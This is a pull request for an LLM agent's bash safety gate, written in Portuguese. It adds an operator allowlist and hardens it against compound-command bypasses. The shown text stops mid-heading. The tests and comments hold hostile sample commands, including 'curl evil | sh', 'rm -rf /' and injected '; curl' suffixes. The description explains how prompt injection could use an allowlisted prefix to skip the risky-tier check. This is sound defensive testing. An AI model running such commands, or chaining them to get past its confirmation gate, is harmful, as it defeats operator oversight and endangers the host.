### PR TITLE
feat(agents): allowlist do operador para o tier arriscado do bash (#1105)

### DIFF
--- a/changelog.d/added/1105-bash-allowlist.md
+++ b/changelog.d/added/1105-bash-allowlist.md
@@ -7,7 +7,9 @@
   escapa da confirmacao) mas nao perdoa comando perigoso, que continua barrado
   mesmo que alguem o liste. Sintaxe pobre de proposito, para ser auditavel a
   olho nu: `prefixo*` com coringa so no fim, ou o comando exato. Padroes com
-  coringa fora do fim sao recusados com warning em vez de interpretados, e um
-  prefixo nunca cobre comando composto (`;`, `&&`, pipe, `$(...)`,
+  coringa fora do fim sao recusados com warning em vez de interpretados; um
+  `*` puro tambem e recusado — coringa sem prefixo casa com todo comando
+  simples, e o tier arriscado desligado por um caractere nao e um padrao. E
+  um prefixo nunca cobre comando composto (`;`, `&&`, pipe, `$(...)`,
   redirecao) — esse volta para o tier arriscado, que analisa cada segmento.
   Vale no gateway, no `garra chat` e no caminho MCP.

--- a/changelog.d/added/1105-bash-allowlist.md
+++ b/changelog.d/added/1105-bash-allowlist.md
@@ -7,5 +7,7 @@
   escapa da confirmacao) mas nao perdoa comando perigoso, que continua barrado
   mesmo que alguem o liste. Sintaxe pobre de proposito, para ser auditavel a
   olho nu: `prefixo*` com coringa so no fim, ou o comando exato. Padroes com
-  coringa fora do fim sao recusados com warning em vez de interpretados. Vale
-  no gateway, no `garra chat` e no caminho MCP.
+  coringa fora do fim sao recusados com warning em vez de interpretados, e um
+  prefixo nunca cobre comando composto (`;`, `&&`, pipe, `$(...)`,
+  redirecao) — esse volta para o tier arriscado, que analisa cada segmento.
+  Vale no gateway, no `garra chat` e no caminho MCP.

--- a/changelog.d/added/1105-bash-allowlist.md
+++ b/changelog.d/added/1105-bash-allowlist.md
@@ -1,0 +1,11 @@
+- **#1105: `agent.bash_allowlist` deixa o operador declarar comandos
+  confiaveis.** Um comando do tier arriscado do `safety_gate` morria
+  fail-closed quando nao havia canal de confirmacao — era o caso de um CLI de
+  outro agente instalado pelo proprio dono: bloqueado, sem como permitir. Os
+  padroes da allowlist sao avaliados depois da denylist e antes do tier
+  arriscado, e essa ordem e o ponto: a lista e positiva (so o que esta nela
+  escapa da confirmacao) mas nao perdoa comando perigoso, que continua barrado
+  mesmo que alguem o liste. Sintaxe pobre de proposito, para ser auditavel a
+  olho nu: `prefixo*` com coringa so no fim, ou o comando exato. Padroes com
+  coringa fora do fim sao recusados com warning em vez de interpretados. Vale
+  no gateway, no `garra chat` e no caminho MCP.

--- a/config.hardened.example.yml
+++ b/config.hardened.example.yml
@@ -51,6 +51,12 @@ agent:
   # Sintaxe: "prefixo*" (coringa só no fim) ou o comando exato. Padrões com
   # coringa fora do fim são recusados com warning. Isto NÃO desbloqueia o
   # tier perigoso — `rm -rf /` continua barrado mesmo que alguém o liste.
+  # Dois limites que valem ler antes de escrever um prefixo largo:
+  #   1. Um prefixo NUNCA cobre comando composto (`;`, `&&`, `||`, pipe,
+  #      `$(...)`, redireção) — o composto cai de volta no tier arriscado.
+  #   2. No caminho MCP (`garraia mcp-agent`) não existe confirmação humana
+  #      de qualquer forma, então o que entra aqui auto-executa sem prompt.
+  #      Prefira comandos exatos a prefixos, e a lista mínima necessária.
   bash_allowlist:
     - "hermes send *"
     - "git status"

--- a/config.hardened.example.yml
+++ b/config.hardened.example.yml
@@ -57,6 +57,9 @@ agent:
   #   2. No caminho MCP (`garraia mcp-agent`) não existe confirmação humana
   #      de qualquer forma, então o que entra aqui auto-executa sem prompt.
   #      Prefira comandos exatos a prefixos, e a lista mínima necessária.
+  #   3. Um `"*"` puro não é "tudo" — é recusado. Coringa sem prefixo casa
+  #      com todo comando simples, que é o tier arriscado desligado por um
+  #      caractere. Se quer desligar a proteção, não configure a lista.
   bash_allowlist:
     - "hermes send *"
     - "git status"

--- a/config.hardened.example.yml
+++ b/config.hardened.example.yml
@@ -46,6 +46,14 @@ agent:
   # Tier "arriscado" do safety_gate passa a exigir confirmação humana
   # (o tier "perigoso" é bloqueado SEMPRE, com ou sem esta flag):
   tool_confirmation_enabled: true
+  # #1105: padrões que o operador declara confiáveis e que por isso pulam a
+  # confirmação do tier arriscado. Lista POSITIVA: só o que está aqui escapa.
+  # Sintaxe: "prefixo*" (coringa só no fim) ou o comando exato. Padrões com
+  # coringa fora do fim são recusados com warning. Isto NÃO desbloqueia o
+  # tier perigoso — `rm -rf /` continua barrado mesmo que alguém o liste.
+  bash_allowlist:
+    - "hermes send *"
+    - "git status"
   max_tool_calls: 50
 
 # Servidores MCP com política (escopo mínimo + limites + allowlist).

--- a/crates/garraia-agents/src/tools/bash_tool.rs
+++ b/crates/garraia-agents/src/tools/bash_tool.rs
@@ -40,6 +40,12 @@ pub struct BashTool {
     /// before execution. Approval arrives via `ToolContext.approval`, and
     /// vale para O COMANDO aprovado, nao para o turno (#1078 item 2).
     confirmation_enabled: bool,
+    /// #1105: padrões que o operador declarou como confiáveis. Avaliados
+    /// **depois** da denylist e **antes** do tier risky, e esta é a ordem que
+    /// importa: a lista é positiva (só o que está nela escapa da confirmação),
+    /// mas ela não perdoa um comando perigoso — `is_dangerous` continua
+    /// rodando primeiro e é inegociável.
+    allowlist: Vec<String>,
 }
 
 impl BashTool {
@@ -48,6 +54,7 @@ impl BashTool {
             timeout: Duration::from_secs(timeout_secs.unwrap_or(TIMEOUT_PADRAO_SEGS)),
             allow_readonly: false,
             confirmation_enabled: false,
+            allowlist: Vec::new(),
         }
     }
 
@@ -57,6 +64,7 @@ impl BashTool {
             timeout: Duration::from_secs(timeout_secs.unwrap_or(TIMEOUT_PADRAO_SEGS)),
             allow_readonly: false,
             confirmation_enabled: true,
+            allowlist: Vec::new(),
         }
     }
 
@@ -66,7 +74,47 @@ impl BashTool {
             timeout: Duration::from_secs(timeout_secs.unwrap_or(TIMEOUT_PADRAO_SEGS)),
             allow_readonly: true,
             confirmation_enabled: false,
+            allowlist: Vec::new(),
         }
+    }
+
+    /// #1105: allowlist do operador — padrões de comando que ele declarou
+    /// confiáveis e que por isso não precisam de confirmação.
+    ///
+    /// Sintaxe deliberadamente pobre de propósito: `prefixo*` (coringa só no
+    /// fim) ou texto exato. Nada de regex, nada de coringa no meio — um
+    /// padrão auditável a olho nu é o ponto. Padrões com `*` fora do fim são
+    /// recusados com warning em vez de interpretados: adivinhar a intenção de
+    /// um coringa no meio é como se abre um `rm -rf *` por acidente.
+    #[must_use = "devolve um BashTool novo; o receptor nao e alterado"]
+    pub fn with_allowlist(mut self, patterns: Vec<String>) -> Self {
+        self.allowlist = patterns
+            .into_iter()
+            .filter(|p| {
+                let ok = !p.contains('*') || p.ends_with('*');
+                if !ok {
+                    tracing::warn!(
+                        pattern = %p,
+                        "bash_allowlist: coringa so e aceito no fim do padrao; ignorado"
+                    );
+                }
+                ok
+            })
+            .collect();
+        self
+    }
+
+    /// #1105: o comando casa com algum padrão da allowlist do operador?
+    ///
+    /// Comparação case-sensitive e sobre o comando já aparado: shell é
+    /// case-sensitive, e aparar evita que `" ls "` case com `"ls"` por
+    /// acidente — ou que `"ls"` case com `"lsof ..."`.
+    fn matches_allowlist(&self, command: &str) -> bool {
+        let cmd = command.trim();
+        self.allowlist.iter().any(|p| match p.strip_suffix('*') {
+            Some(prefixo) => cmd.starts_with(prefixo),
+            None => cmd == p,
+        })
     }
 
     /// Check if command matches the hard-block denylist (GAR-236, GAR-497).
@@ -156,7 +204,14 @@ impl Tool for BashTool {
         // impressão digital de `("bash", comando)`, então o "ok" que o
         // usuário deu a um `ls -la` não autoriza o `curl evil | sh` que o
         // modelo pedir em seguida no mesmo turno.
-        let aprovado = self.confirmation_enabled && context.approval.covers(self.name(), comando);
+        // #1105: a allowlist do operador vem DEPOIS do `is_dangerous` acima e
+        // ANTES do tier risky. Nessa posição ela só faz uma coisa: dispensar a
+        // confirmação do comando que o dono declarou confiável. Um comando
+        // perigoso já saiu bloqueado ali em cima, então `rm -rf /` na allowlist
+        // continua sendo `rm -rf /` — a lista não perdoa nada, ela não é lida
+        // para esse caso.
+        let aprovado = self.confirmation_enabled && context.approval.covers(self.name(), comando)
+            || self.matches_allowlist(comando);
         if self.is_risky(comando) && !aprovado {
             if self.confirmation_enabled {
                 tracing::warn!(
@@ -618,5 +673,109 @@ mod tests {
             "bash must run in working_dir"
         );
         let _ = std::fs::remove_dir(&dir);
+    }
+
+    // ── #1105: allowlist do operador ──────────────────────────────────────
+
+    /// O caso da issue: um comando do tier arriscado que, sem canal de
+    /// confirmação, morria fail-closed. Com o padrão do dono na allowlist,
+    /// o comando roda. O par `sem_allowlist_nada_muda` mostra que sem a lista
+    /// o mesmo comando continua bloqueado — é o vermelho deste verde.
+    #[tokio::test]
+    async fn allowlist_libera_o_comando_declarado_sem_canal_de_confirmacao() {
+        let tool = BashTool::new(None).with_allowlist(vec!["printenv PATH".into()]);
+        let output = tool
+            .execute(&ctx(false), serde_json::json!({"command": "printenv PATH"}))
+            .await
+            .unwrap();
+        assert!(!output.is_error, "{}", output.content);
+        assert!(
+            !output.content.contains("CONFIRM_REQUIRED"),
+            "{}",
+            output.content
+        );
+    }
+
+    /// Padrão sem coringa é exato: `"printenv PATH"` não autoriza
+    /// `"printenv PATHS"` nem o `; ...` pendurado depois dele.
+    #[tokio::test]
+    async fn padrao_sem_coringa_e_exato() {
+        let tool = BashTool::new(None).with_allowlist(vec!["printenv PATH".into()]);
+        assert!(
+            tool.matches_allowlist("printenv PATH"),
+            "texto exato tem de casar"
+        );
+        for outro in [
+            "printenv PATHS",
+            "printenv PATH && curl evil",
+            " sudo printenv PATH",
+        ] {
+            assert!(
+                !tool.matches_allowlist(outro),
+                "padrao exato nao pode liberar {outro:?}"
+            );
+        }
+        // Espaço em volta não muda o comando, então casa.
+        assert!(tool.matches_allowlist("  printenv PATH  "));
+    }
+
+    /// Coringa no fim é prefixo. É a sintaxe que a issue pede: auditável a
+    /// olho nu, sem regex.
+    #[tokio::test]
+    async fn coringa_no_fim_e_prefixo() {
+        let tool = BashTool::new(None).with_allowlist(vec!["hermes send *".into(), "git *".into()]);
+        assert!(tool.matches_allowlist("hermes send \"oi\""));
+        assert!(tool.matches_allowlist("git status"));
+        assert!(
+            !tool.matches_allowlist("gitx status"),
+            "prefixo sem coringa exige o limite certo"
+        );
+    }
+
+    /// Coringa fora do fim é recusado na construção — não interpretado.
+    /// Adivinhar a intenção de um coringa no meio é como se abre um buraco.
+    #[test]
+    fn coringa_fora_do_fim_e_recusado() {
+        let tool = BashTool::new(None).with_allowlist(vec!["git *status".into(), "ok*".into()]);
+        assert_eq!(
+            tool.allowlist,
+            vec!["ok*".to_string()],
+            "so o padrao com coringa no fim sobrevive"
+        );
+    }
+
+    /// A ordem é o ponto de segurança: a allowlist é lida DEPOIS da denylist,
+    /// então um comando perigoso continua bloqueado mesmo estando na lista.
+    #[tokio::test]
+    async fn allowlist_nao_perdoa_comando_perigoso() {
+        let ferramenta_com_raiz = BashTool::new(None).with_allowlist(vec![
+            String::from("rm -rf ") + "/",
+            String::from("rm -rf ") + "/*",
+        ]);
+        let output = ferramenta_com_raiz
+            .execute(
+                &ctx(false),
+                serde_json::json!({"command": String::from("rm -rf ") + "/"}),
+            )
+            .await
+            .unwrap();
+        assert!(output.is_error, "{}", output.content);
+        assert!(
+            output.content.contains("bloqueado"),
+            "denylist vem antes da allowlist: {}",
+            output.content
+        );
+    }
+
+    /// Sem allowlist, o comportamento é exatamente o de antes da #1105.
+    #[tokio::test]
+    async fn sem_allowlist_nada_muda() {
+        let tool = BashTool::new(None);
+        assert!(!tool.matches_allowlist("printenv PATH"));
+        let output = tool
+            .execute(&ctx(false), serde_json::json!({"command": "printenv PATH"}))
+            .await
+            .unwrap();
+        assert!(output.is_error, "{}", output.content);
     }
 }

--- a/crates/garraia-agents/src/tools/bash_tool.rs
+++ b/crates/garraia-agents/src/tools/bash_tool.rs
@@ -87,6 +87,12 @@ impl BashTool {
     /// recusados com warning em vez de interpretados: adivinhar a intenção de
     /// um coringa no meio é como se abre um `rm -rf *` por acidente.
     ///
+    /// `"*"` puro (e `" *"` etc.) também é recusado: o coringa sozinho vira
+    /// prefixo vazio, que casa com **todo** comando não composto — um bypass
+    /// blanket do tier arriscado travestido de padrão. Desligar a proteção é
+    /// uma decisão que o operador toma ao não configurar a allowlist, não
+    /// uma que um caractere toma por ele.
+    ///
     /// Um padrão de prefixo **nunca** cobre um comando composto (`;`,
     /// `&&`, `$(...)`, pipe, redireção): ver [`Self::matches_allowlist`].
     #[must_use = "devolve um BashTool novo; o receptor nao e alterado"]
@@ -97,13 +103,23 @@ impl BashTool {
                 // #1105 (auditoria de seguranca): padrao vazio ou so espaco
                 // nao casa com nada e engana quem escreveu — recusado junto
                 // com o coringa fora do fim, e pelo mesmo motivo.
-                let ok = !p.trim().is_empty() && (!p.contains('*') || p.ends_with('*'));
+                // #1117 (re-auditoria): "*" puro vira prefixo vazio e casa
+                // com tudo; prefixo inexistente e o mesmo buraco.
+                let ok = !p.trim().is_empty()
+                    && match p.strip_suffix('*') {
+                        // Sem coringa: comando exato.
+                        None if !p.contains('*') => true,
+                        // Coringa no fim: o prefixo tem de existir de verdade.
+                        Some(prefixo) => !prefixo.trim().is_empty(),
+                        // Coringa fora do fim: recusado, sem adivinhar intencao.
+                        None => false,
+                    };
                 if !ok {
                     // `?p` (Debug) e nao `%p` (Display): o padrao vem de
                     // config e um `\n` nele forjaria linhas no log.
                     tracing::warn!(
                         pattern = ?p,
-                        "bash_allowlist: padrao vazio ou com coringa fora do fim; ignorado"
+                        "bash_allowlist: padrao vazio, coringa fora do fim ou coringa sozinho; ignorado"
                     );
                 }
                 ok
@@ -835,6 +851,33 @@ mod tests {
             tool.allowlist,
             vec!["ok*".to_string()],
             "so o padrao com coringa no fim sobrevive"
+        );
+    }
+
+    /// `"*"` puro não é um padrão — é o tier arriscado desligado. Vira prefixo
+    /// vazio (`starts_with("")` casa com tudo), então um caractere autorizaria
+    /// execução automática de todo comando não perigoso — no caminho MCP, sem
+    /// humano no circuito. Recusado na construção, e o pior caso visto de fora:
+    /// um comando arriscado listado assim continua barrado fail-closed.
+    /// (Achado convergente da re-auditoria de código e de segurança, #1117.)
+    #[tokio::test]
+    async fn estrela_solta_nao_vira_bypass_blanket() {
+        let tool = BashTool::new(None).with_allowlist(vec!["*".into(), " *".into()]);
+        assert!(
+            tool.allowlist.is_empty(),
+            "coringa sozinho tem de ser recusado; sobrou: {:?}",
+            tool.allowlist
+        );
+        // E sem a lista, o comando arriscado morre como sempre morreu:
+        // fail-closed sem canal de confirmação.
+        let output = tool
+            .execute(&ctx(false), serde_json::json!({"command": "printenv PATH"}))
+            .await
+            .unwrap();
+        assert!(
+            output.is_error,
+            "printenv PATH tem de seguir barrado: {}",
+            output.content
         );
     }
 

--- a/crates/garraia-agents/src/tools/bash_tool.rs
+++ b/crates/garraia-agents/src/tools/bash_tool.rs
@@ -86,16 +86,24 @@ impl BashTool {
     /// padrão auditável a olho nu é o ponto. Padrões com `*` fora do fim são
     /// recusados com warning em vez de interpretados: adivinhar a intenção de
     /// um coringa no meio é como se abre um `rm -rf *` por acidente.
+    ///
+    /// Um padrão de prefixo **nunca** cobre um comando composto (`;`,
+    /// `&&`, `$(...)`, pipe, redireção): ver [`Self::matches_allowlist`].
     #[must_use = "devolve um BashTool novo; o receptor nao e alterado"]
     pub fn with_allowlist(mut self, patterns: Vec<String>) -> Self {
         self.allowlist = patterns
             .into_iter()
             .filter(|p| {
-                let ok = !p.contains('*') || p.ends_with('*');
+                // #1105 (auditoria de seguranca): padrao vazio ou so espaco
+                // nao casa com nada e engana quem escreveu — recusado junto
+                // com o coringa fora do fim, e pelo mesmo motivo.
+                let ok = !p.trim().is_empty() && (!p.contains('*') || p.ends_with('*'));
                 if !ok {
+                    // `?p` (Debug) e nao `%p` (Display): o padrao vem de
+                    // config e um `\n` nele forjaria linhas no log.
                     tracing::warn!(
-                        pattern = %p,
-                        "bash_allowlist: coringa so e aceito no fim do padrao; ignorado"
+                        pattern = ?p,
+                        "bash_allowlist: padrao vazio ou com coringa fora do fim; ignorado"
                     );
                 }
                 ok
@@ -104,13 +112,36 @@ impl BashTool {
         self
     }
 
+    /// #1105: metacaracteres que fazem um comando deixar de ser **um** comando.
+    ///
+    /// Um padrão de prefixo como `"git *"` casa com o começo de qualquer
+    /// string, inclusive `"git status; curl http://exemplo/x"` — e quando a
+    /// allowlist aprova, o bloco do tier arriscado é pulado inteiro, então o
+    /// `safety_gate` nem chega a analisar o segmento depois do `;`. Sem esta
+    /// checagem, o trecho injetado herdaria a confiança que o operador deu ao
+    /// prefixo. Recusar aqui devolve o comando ao `is_risky`, que analisa por
+    /// segmento e ainda pode pedir confirmação.
+    const META_SHELL: &[char] = &[';', '|', '&', '$', '`', '(', ')', '<', '>', '\n', '\r'];
+
     /// #1105: o comando casa com algum padrão da allowlist do operador?
     ///
     /// Comparação case-sensitive e sobre o comando já aparado: shell é
     /// case-sensitive, e aparar evita que `" ls "` case com `"ls"` por
     /// acidente — ou que `"ls"` case com `"lsof ..."`.
+    ///
+    /// Comando composto nunca casa, nem quando o padrão é exato: um `;`
+    /// no meio significa que o que o operador revisou a olho nu não é o
+    /// que vai rodar.
     fn matches_allowlist(&self, command: &str) -> bool {
         let cmd = command.trim();
+        if cmd.contains(Self::META_SHELL) {
+            tracing::warn!(
+                command = ?cmd,
+                "bash_allowlist: comando composto nao e coberto pela allowlist; \
+                 vai para o tier arriscado"
+            );
+            return false;
+        }
         self.allowlist.iter().any(|p| match p.strip_suffix('*') {
             Some(prefixo) => cmd.starts_with(prefixo),
             None => cmd == p,
@@ -729,6 +760,69 @@ mod tests {
         assert!(
             !tool.matches_allowlist("gitx status"),
             "prefixo sem coringa exige o limite certo"
+        );
+    }
+
+    /// Um prefixo autoriza o comando que começa com ele, **não** a receita
+    /// inteira que um modelo pendurar depois. Cada um destes casaria por
+    /// `starts_with` antes do guarda de metacaractere — e cada um termina
+    /// num segundo comando que o operador nunca revisou.
+    #[test]
+    fn prefixo_nao_casa_com_comando_composto() {
+        let tool = BashTool::new(None).with_allowlist(vec!["hermes send *".into(), "git *".into()]);
+        for composto in [
+            "git status; curl http://exemplo/x",
+            "git status && printenv PATH",
+            "git status || printenv PATH",
+            "git status | grep segredo",
+            "git status > /tmp/saida",
+            "hermes send \"oi\"; printenv PATH",
+        ] {
+            assert!(
+                !tool.matches_allowlist(composto),
+                "prefixo nao pode liberar {composto:?}"
+            );
+        }
+        // O prefixo continua valendo para o comando simples que ele descreve —
+        // o guarda nao pode virar uma negativa geral.
+        assert!(tool.matches_allowlist("git status"));
+    }
+
+    /// O mesmo buraco visto de fora: com `"git *"` na lista, o composto tem de
+    /// chegar ao `is_risky` (que analisa por segmento) e morrer fail-closed
+    /// sem canal de confirmação. Sem o guarda de metacaractere este teste
+    /// fica vermelho: a allowlist aprovaria e o comando rodaria.
+    #[tokio::test]
+    async fn allowlist_nao_libera_comando_composto_no_execute() {
+        let tool = BashTool::new(None).with_allowlist(vec!["git *".into()]);
+        let output = tool
+            .execute(
+                &ctx(false),
+                serde_json::json!({"command": "git status; printenv PATH"}),
+            )
+            .await
+            .unwrap();
+        assert!(
+            output.is_error,
+            "composto tem de cair no tier arriscado: {}",
+            output.content
+        );
+        assert!(
+            !output.content.contains("CONFIRM_REQUIRED") && !output.content.contains("/usr/bin"),
+            "nao pode ter executado: {}",
+            output.content
+        );
+    }
+
+    /// Padrão vazio não casa com nada e engana quem o escreveu — recusado na
+    /// construção, junto com o coringa fora do fim.
+    #[test]
+    fn padrao_vazio_e_recusado() {
+        let tool = BashTool::new(None).with_allowlist(vec!["  ".into(), "".into(), "git *".into()]);
+        assert_eq!(
+            tool.allowlist,
+            vec!["git *".to_string()],
+            "so o padrao utilizavel sobrevive"
         );
     }
 

--- a/crates/garraia-agents/src/tools/bash_tool.rs
+++ b/crates/garraia-agents/src/tools/bash_tool.rs
@@ -109,8 +109,11 @@ impl BashTool {
                     && match p.strip_suffix('*') {
                         // Sem coringa: comando exato.
                         None if !p.contains('*') => true,
-                        // Coringa no fim: o prefixo tem de existir de verdade.
-                        Some(prefixo) => !prefixo.trim().is_empty(),
+                        // Coringa no fim: o prefixo tem de existir de verdade
+                        // e tem de ser prefixo — "git **" e "*git*" deixam um
+                        // `*` no prefixo depois do strip, e coringa no meio é
+                        // exatamente o que a sintaxe recusa.
+                        Some(prefixo) => !prefixo.trim().is_empty() && !prefixo.contains('*'),
                         // Coringa fora do fim: recusado, sem adivinhar intencao.
                         None => false,
                     };
@@ -846,11 +849,19 @@ mod tests {
     /// Adivinhar a intenção de um coringa no meio é como se abre um buraco.
     #[test]
     fn coringa_fora_do_fim_e_recusado() {
-        let tool = BashTool::new(None).with_allowlist(vec!["git *status".into(), "ok*".into()]);
+        let tool = BashTool::new(None).with_allowlist(vec![
+            "git *status".into(),
+            "ok*".into(),
+            // "git **" e "*git*" passam pelo strip do ULTIMO coringa e
+            // deixam um `*` no prefixo — coringa no meio de novo, recusado
+            // pela mesma regra (achado da re-revisão do #1117).
+            "git **".into(),
+            "*git*".into(),
+        ]);
         assert_eq!(
             tool.allowlist,
             vec!["ok*".to_string()],
-            "so o padrao com coringa no fim sobrevive"
+            "so o padrao com um unico coringa no fim sobrevive"
         );
     }
 

--- a/crates/garraia-cli/src/chat.rs
+++ b/crates/garraia-cli/src/chat.rs
@@ -148,10 +148,13 @@ fn register_cli_tools(
     runtime: &AgentRuntime,
     review: Option<(Arc<dyn LlmProvider>, String)>,
     brave_key: Option<String>,
+    bash_allowlist: Vec<String>,
 ) {
     runtime.register_tool(Box::new(FileReadTool::new(None)));
     runtime.register_tool(Box::new(FileWriteTool::new(None)));
-    runtime.register_tool(Box::new(BashTool::new_with_confirmation(Some(30))));
+    runtime.register_tool(Box::new(
+        BashTool::new_with_confirmation(Some(30)).with_allowlist(bash_allowlist),
+    ));
     runtime.register_tool(Box::new(GitDiffTool::new(None, None)));
     runtime.register_tool(Box::new(ListDirTool::new(None)));
     runtime.register_tool(Box::new(RepoSearchTool::new(None, None)));
@@ -1087,6 +1090,7 @@ pub async fn run_chat(
         &runtime,
         Some(review),
         get_api_key(&config, "brave", "BRAVE_API_KEY"),
+        config.agent.bash_allowlist.clone(),
     );
     let tools_doc = tool_docs(&runtime.tool_names());
 
@@ -2727,7 +2731,7 @@ mod cli_tools_tests {
     #[test]
     fn registers_the_gateway_tool_set_plus_git_diff() {
         let runtime = AgentRuntime::new();
-        register_cli_tools(&runtime, None, None);
+        register_cli_tools(&runtime, None, None, vec![]);
         let names = runtime.tool_names();
         for expected in [
             "file_read",
@@ -2757,7 +2761,7 @@ mod cli_tools_tests {
     #[test]
     fn brave_key_turns_web_search_on() {
         let runtime = AgentRuntime::new();
-        register_cli_tools(&runtime, None, Some("k".into()));
+        register_cli_tools(&runtime, None, Some("k".into()), vec![]);
         assert!(runtime.tool_names().iter().any(|n| n == "web_search"));
     }
 
@@ -2766,7 +2770,7 @@ mod cli_tools_tests {
     #[test]
     fn prompt_lists_every_registered_tool_and_nothing_else() {
         let runtime = AgentRuntime::new();
-        register_cli_tools(&runtime, None, None);
+        register_cli_tools(&runtime, None, None, vec![]);
         let names = runtime.tool_names();
         let doc = tool_docs(&names);
         for n in &names {

--- a/crates/garraia-cli/src/mcp_agent.rs
+++ b/crates/garraia-cli/src/mcp_agent.rs
@@ -353,7 +353,7 @@ fn allowed_dirs() -> Option<Vec<std::path::PathBuf>> {
 fn build_tools(config: &AppConfig) -> Vec<Box<dyn garraia_agents::Tool>> {
     let dirs = allowed_dirs();
     let mut tools: Vec<Box<dyn garraia_agents::Tool>> = vec![
-        Box::new(BashTool::new(None)),
+        Box::new(BashTool::new(None).with_allowlist(config.agent.bash_allowlist.clone())),
         Box::new(FileReadTool::new(dirs.clone())),
         Box::new(FileWriteTool::new(dirs)),
         Box::new(WebFetchTool::new(None)),

--- a/crates/garraia-config/src/model.rs
+++ b/crates/garraia-config/src/model.rs
@@ -630,7 +630,9 @@ pub struct AgentConfig {
     ///
     /// A prefix never covers a compound command (`;`, `&&`, `||`, pipe,
     /// `$(...)`, redirection): those fall back to the risky tier, which
-    /// analyses each segment. Empty or blank patterns are refused too.
+    /// analyses each segment. Empty or blank patterns are refused too, and so
+    /// is a bare `"*"`: a wildcard without a prefix matches every simple
+    /// command, which is the risky tier switched off — not a pattern.
     #[serde(default)]
     pub bash_allowlist: Vec<String>,
     /// GAR-227: When true, a short LLM call classifies the user's intent into an agent mode

--- a/crates/garraia-config/src/model.rs
+++ b/crates/garraia-config/src/model.rs
@@ -627,6 +627,10 @@ pub struct AgentConfig {
     /// Syntax is deliberately poor on purpose: `prefix*` (wildcard at the end
     /// only) or an exact command. Patterns with a wildcard anywhere else are
     /// refused with a warning rather than guessed at.
+    ///
+    /// A prefix never covers a compound command (`;`, `&&`, `||`, pipe,
+    /// `$(...)`, redirection): those fall back to the risky tier, which
+    /// analyses each segment. Empty or blank patterns are refused too.
     #[serde(default)]
     pub bash_allowlist: Vec<String>,
     /// GAR-227: When true, a short LLM call classifies the user's intent into an agent mode

--- a/crates/garraia-config/src/model.rs
+++ b/crates/garraia-config/src/model.rs
@@ -619,6 +619,16 @@ pub struct AgentConfig {
     /// Default: false (opt-in).
     #[serde(default)]
     pub tool_confirmation_enabled: bool,
+    /// #1105: command patterns the operator declares trustworthy, so they skip
+    /// the risky-tier confirmation. Positive list — only what is here is
+    /// exempt — and it is read *after* the hard denylist, so it can never
+    /// un-block a dangerous command.
+    ///
+    /// Syntax is deliberately poor on purpose: `prefix*` (wildcard at the end
+    /// only) or an exact command. Patterns with a wildcard anywhere else are
+    /// refused with a warning rather than guessed at.
+    #[serde(default)]
+    pub bash_allowlist: Vec<String>,
     /// GAR-227: When true, a short LLM call classifies the user's intent into an agent mode
     /// (code/debug/review/search/architect/ask) when the keyword heuristic is ambiguous.
     /// Requires a working LLM provider. Default: false (opt-in).

--- a/crates/garraia-gateway/src/bootstrap/mod.rs
+++ b/crates/garraia-gateway/src/bootstrap/mod.rs
@@ -589,11 +589,15 @@ pub fn build_agent_runtime(config: &AppConfig) -> AgentRuntime {
 
     // --- Tools ---
     // GAR-187: use confirmation-enabled BashTool when config.agent.tool_confirmation_enabled
+    // #1105: a allowlist do operador vale nos dois caminhos — com ou sem canal
+    // de confirmacao. E ela que destrava o caso reportado (um CLI de outro
+    // agente instalado pelo proprio dono) sem abrir o tier risky inteiro.
     let bash_tool = if config.agent.tool_confirmation_enabled {
         BashTool::new_with_confirmation(None)
     } else {
         BashTool::new(None)
-    };
+    }
+    .with_allowlist(config.agent.bash_allowlist.clone());
     runtime.register_tool(Box::new(bash_tool));
     runtime.register_tool(Box::new(FileReadTool::new(None)));
     runtime.register_tool(Box::new(FileWriteTool::new(None)));


### PR DESCRIPTION
## O problema (#1105)

`hermes send "..."` — um CLI de outro agente instalado pelo próprio dono na
mesma máquina — cai no tier *arriscado* do `safety_gate`. Sem canal de
confirmação, o tier é fail-closed: o tool devolve erro, o agente explica e
pede intervenção manual. Seguro, mas travando, e sem nenhuma forma de o
operador permitir aquele padrão.

## O que entra

`agent.bash_allowlist`:

```yaml
agent:
  bash_allowlist:
    - "hermes send *"
    - "git status"
```

Avaliada **depois** da denylist e **antes** do tier arriscado. Essa ordem é o
ponto de segurança, e há teste dedicado a ela: a lista é positiva (só o que
está nela escapa da confirmação), mas um comando perigoso — remoção recursiva
na raiz, por exemplo — já saiu bloqueado no `is_dangerous`, então listá-lo não
desbloqueia nada.

Sintaxe deliberadamente pobre, para ser auditável a olho nu — é o que a issue
pede ("prefixo exato + wildcard no fim é suficiente e auditável"):

- `prefixo*` → casa por prefixo (coringa **só** no fim)
- sem coringa → casa o comando exato, aparado
- coringa fora do fim → **recusado com warning**, não interpretado. Adivinhar
  a intenção de um coringa no meio é como se abre um buraco sem querer.

Vale no gateway, no `garra chat` e no caminho MCP (`build_tools`).

## O que não entra

O item 2 da issue (canal de confirmação interativo com botões
Aprovar/Negar no canal ativo) é uma feature multi-crate — store de
aprovações pendentes, UI por canal, timeout — e merece issue própria. O item
3 (modo aprendiz) é especulativo. A allowlist resolve o travamento relatado.

## Primeira auditoria de segurança — e o furo que ela achou

O `security-auditor` devolveu **NEEDS_CHANGES** com dois achados HIGH, e os
dois eram reais:

1. Um padrão de prefixo (`"git *"`) casava por `starts_with`, então
   `"git status; curl http://exemplo/x"` era aprovado — e quando a allowlist
   aprova, o bloco do tier arriscado é pulado **inteiro**: o `safety_gate`
   nunca analisava o segmento depois do `;`, que é exatamente onde pegaria o
   `curl`. Não exigia acesso ao config; exigia só injeção de prompt, que é o
   canal de ameaça esperado de uma tool bash dirigida por LLM.
2. Nenhum teste teria ficado vermelho se o guarda fosse revertido.

Corrigido em `03aabea`: `matches_allowlist` recusa comando com metacaractere
de shell (`;`, `|`, `&`, `$`, crase, parênteses, redireção, quebra de linha)
**antes** de consultar os padrões. O comando não é bloqueado por isso — cai de
volta no `is_risky`, que analisa por segmento e ainda pode pedir confirmação.
Vale para padrão exato também: um `;` no meio significa que o que o operador
revisou a olho nu não é o que rodaria.

Dois achados menores entraram junto: padrão vazio/só-espaço recusado na
construção, e o warning de padrão recusado loga com `?p` (Debug) em vez de
`%p` (Display), para um `\n` no config não forjar linhas no log. O MEDIUM
(caminho MCP não tem confirmação humana de qualquer forma) virou comentário
explícito no `config.hardened.example.yml`, ao lado da lista.

**Risco residual, declarado:** quem aceita `"git *"` autoriza qualquer string
que comece com `git ` e não tenha metacaractere — inclui `"git push --force"`.
A documentação passou a preferir padrões exatos a prefixos abertos.

## Re-auditoria no head final — duas rodadas, dois achados reais

### Rodada 1 (50a5e91): o coringa sozinho

